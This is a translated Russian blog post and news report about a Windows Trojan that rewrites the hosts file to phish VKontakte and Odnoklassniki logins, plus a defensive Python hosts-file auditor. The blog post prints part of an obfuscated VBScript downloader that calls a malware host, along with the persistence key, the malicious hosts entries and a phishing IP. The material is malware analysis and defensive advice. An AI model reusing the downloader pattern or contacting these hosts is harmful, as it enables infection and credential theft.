After some simple transformations it turns out that the numbers hide the copying of a script named l.vbs into the system folder of my computer, and its subsequent launch.

The address where the script is located on the network:


http://tjyre.info/games/hcp_vbs.php?f=17

The file that opens contains the following text:

« w = 3000: x = 200: y = 1: z = false: a = " http://tjyre.info/u.php?e=7&f=17": Set e = Createobject (StrReverse (" tcejbOmetsySeliF.gnitpircS ")): Set f = e.GetSpecialFolder (2): b = f &" \ exe.ex2 ": b = Replace (b, Month (" 2010-02 -16 ")," e "): OT =" GET ": Set c = CreateObject (StrReverse (" PTTHLMX.2LMXSM ")): Set d = CreateObject (StrReverse (" maertS.BDODA ")) ... Removed for stupid reasons ...g =o.GetFile (b):g.Delete»

The text is quite simple:

    we see the date 02/16/2010 (it turns out that the virus does some kind of masking by date; they have already adopted the idea that it has to be masked)

    we see the commands turned inside out (using the reverse), with the help of which the virus file flies into our computer.

A fresh readme.exe lands safely. What does this guest bring us? Surely a lot of fun.

The launch of readme.exe was very successfully blocked by the program antiwinlocker, for which it deserves honor and praise. But since I still want to see what happens, the defenders will have to be asked to step aside for a while.

The first launch of the virus was not remarkable, which is understandable, the virus penetrated and hid until the next boot.

Reboot and silence again. Mystery!!

We'll have to look in secret corners.

We find the lsass.exe file (imitating the system process) in the C:\Documents and Settings\Admin\Application Data folder.

In the registry, respectively, we find the key:

"userinit"="C:\\WINDOWS\\system32\\userinit.exe,C:\\Documents and Settings\\Admin\\Application Data\\lsass.exe" as expected.

But that's not all!

In the folder "C:\WINDOWS\system32\drivers\etc" there is a magic hosts file, to which the virus adds about a dozen magic lines (please see the WHOLE hosts file):

These lines are used to redirect from the Odnoklassniki and VKontakte sites to a very specific site, and also to completely break Kaspersky updates (the virus is similar to Trojan.Win32.Ddox.ci).

What do we see when we go to the villain's site? We see the main page of Odnoklassniki, but if you enter a username and password, they go straight to the "villain". And if you click on some link, we get a very cool request for "account validation". Moreover, the text clearly states: "The service is not available to subscribers in some regions of Megafon". Such a serious approach to business that I did not immediately grasp the meaning of the phrase.

A malicious virus has appeared which changes some settings on the user's computer (it modifies the hosts file), as a result of which you end up in a completely different place from where you were going, although outwardly everything looks as usual. There you enter your password and hand your name and password over to the villains. That's all there is to it.

Read the details and how to fight under the cut.

"VKontakte": 50,000 passwords in the public domain (updated)

A computer virus for the Windows operating system has appeared on the Internet, which hacks the accounts of users of the VKontakte social network.

The Trojan works according to the following principle: it modifies the hosts file (located at C:\WINDOWS\system32\drivers\etc\) in such a way that when the user tries to open his favorite social network, the browser opens a look-alike site instead; as a result, the e-mail address and password are added to the database of stolen accounts immediately after being entered on the fake resource.

The 4.2 MB file contains tens of thousands of valid addresses and passwords. Initially, 130 or even 150 thousand hacked accounts were reported, but by discarding repeated combinations, we found out that there are two to two and a half times less of them. (Which, however, is also impressive.) It is also known that in the near future users of the Odnoklassniki network may come under attack: hackers have already created a corresponding file for their data, but it is currently empty.

We asked specialists from antivirus development companies to comment on the situation, as well as talk about such attacks.

Denis Maslennikov, antivirus expert at Kaspersky Lab: The account data of more than 130 thousand users of the popular Russian social network VKontakte is now freely available. The information was published on one of the hacker sites. Our experts have analyzed this data and confirmed the fact of the compromise. According to our information, the incident looks like this: the site specified in the message, 83.133.120.252, is known to Kaspersky Lab as a phishing site and is blocked when personal products try to access it.

The malicious program Trojan.Win32.VkHost.an (detected by us since July 28) was distributed via a VKontakte application (hxxp://vkontakte.ru/app711384?&M=2, currently blocked by the resource administration). After being installed on the system, this Trojan replaced the hosts file with the following:
83.133.120.252 vkontakte.ru
83.133.120.252 odnoklassniki.ru

Then, when the user tried to open the site of one of these social networks, he was redirected to a phishing page where he had to log in. The login and password went to a database on the same site, 83.133.120.252. At the moment the Odnoklassniki database is empty, so it is too early to talk about a compromise of that social network's user data.

After the user logged into the fake page, a redirect took place - first to a new page. This page contains the following text:

« ATTENTION! Your account has been identified by the system as potentially dangerous. Spam is being sent from your IP address. The account is recognized as a fake, created by cybercriminals for spam mailings, and will be deleted 24 hours after reading this notice, in case of refusal to confirm the account. If the account is real, it must be verified. Send SMS with the text orderit30193 (without spaces), to number 6008 you will receive an Activation Code in return SMS. The cost of SMS corresponds to the cost according to your tariff plan.»

What is most interesting, if a user sends an SMS, then he really receives a certain code, since the site contains pages with the following content:

« Code accepted! Download and run the file - Download.»

« You entered an incorrect code. Come back and enter the code from the sms message!»

We recommend that all users of VKontakte and Odnoklassniki check the contents of their hosts file, located in the %windir%\system32\drivers\etc directory, and if it contains entries for vkontakte.ru and odnoklassniki.ru, delete them.

Be sure to change all passwords for all accounts on social networks. If you land on such phishing pages, in no case enter your username and password, and do not send any SMS messages.

Attackers often use hosts file spoofing to redirect users to phishing web pages. Unfortunately, this primitive method sometimes bears fruit for criminals. If we talk about such schemes of attacks on online banking users, then they are the most popular in Latin America.

Grigory Vasiliev, technical director of ESET: Access to vkontakte.ru accounts was obtained using a pharming attack: redirecting the victim to a false IP address by making changes to the hosts file. The user is taken to a fake page created by the attacker, and the attacker intercepts the passwords to his accounts. At the same time the victim may not notice anything, since outwardly the fake page is no different from the real one.

These attacks are most often used where real money is involved. Therefore, the most widespread use of pharming is in online banking. Modern antivirus products that use HIPS technologies in combination with heuristic analysis can effectively protect users from malware trying to modify the hosts file, even if it is a new unknown threat.
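A defender-side check for the hosts-file tampering that both the blog post above (the redirect of Odnoklassniki and VKontakte plus the blocked Kaspersky updates) and the two vendor comments describe. This is an added example, not code from the page or from any vendor: the WATCHED domain list, the sample hosts content and the kaspersky-labs.com update host are assumptions; the two social-network lines are the ones quoted in the Kaspersky Lab comment.

```python
import ipaddress
import os
from typing import List, NamedTuple

# Constructed sample hosts file: the two social-network lines are quoted in the
# Kaspersky Lab comment above; the AV-update line is a hypothetical illustration.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
83.133.120.252 vkontakte.ru
83.133.120.252 odnoklassniki.ru
0.0.0.0 downloads.kaspersky-labs.com   # hypothetical sinkhole entry
"""

# Domains an attacker has an incentive to pin in hosts (assumed list; extend it).
WATCHED = {"vkontakte.ru", "vk.com", "odnoklassniki.ru", "kaspersky-labs.com"}
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}

Finding = NamedTuple("Finding", [("lineno", int), ("ip", str), ("name", str), ("reason", str)])


def parse_hosts(text: str):
    """Yield (lineno, ip, names) per entry; '#' comments and blank lines are skipped."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        entry = raw.split("#", 1)[0].strip()
        if entry:
            ip, *names = entry.split()
            if names:
                yield lineno, ip, names


def is_watched(name: str) -> bool:
    return any(name == w or name.endswith("." + w) for w in WATCHED)


def audit_hosts(text: str) -> List[Finding]:
    """Flag entries that look like pharming (foreign IP) or update blocking (sinkhole)."""
    findings = []
    for lineno, ip, names in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            findings.append(Finding(lineno, ip, " ".join(names), "unparseable address"))
            continue
        local = addr.is_loopback or addr.is_unspecified
        for name in (n.lower() for n in names):
            if name in LOCAL_NAMES:
                continue  # stock entries every hosts file carries
            if is_watched(name) and not local:
                reason = "watched domain redirected to a foreign IP (pharming)"
            elif is_watched(name):
                reason = "watched domain sinkholed (site or update blocking)"
            elif not local:
                reason = "non-local mapping, verify it is intentional"
            else:
                continue  # loopback/0.0.0.0 for an unwatched name: ad-blocker style
            findings.append(Finding(lineno, ip, name, reason))
    return findings


def audit_system_hosts() -> List[Finding]:
    """Audit this machine's own hosts file (%SystemRoot% path on Windows, else /etc/hosts)."""
    if os.name == "nt":
        path = os.path.join(os.environ.get("SystemRoot", r"C:\Windows"),
                            "System32", "drivers", "etc", "hosts")
    else:
        path = "/etc/hosts"
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_hosts(fh.read())
```

Running `audit_hosts(SAMPLE_HOSTS)` reports the two redirected social-network entries as pharming and the update host as sinkholed; `audit_system_hosts()` runs the same check against the local machine.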

Addition: Apparently the VKontakte staff have forcibly changed the passwords of all the "lucky ones". This step is undoubtedly correct, with one caveat: it does not completely solve the problem. After all, many of us come up with a single password for all occasions, and if so, the owners of the file with the database have the widest scope for experiments...

Addition 2: Kaspersky Lab invites users of the social networks VKontakte and Odnoklassniki to check whether their registration data has ended up in the hands of intruders. This can be done on a special page of the company's information portal. Even though the VKontakte staff change the passwords of the affected users, it is still worth finding out whether your address is in the database (which, by the way, is no longer available at its old address).

If the answer is yes, you need to clean the hosts file and run a full antivirus scan of your PC. And one more thing: if you have used the same password on all the resources you visit (social networks, mail services, ICQ and so on), you urgently need to change it. There may be far more people wanting to take over the rest of your accounts (for example, by trying your old VKontakte password on Odnoklassniki) than it seems.
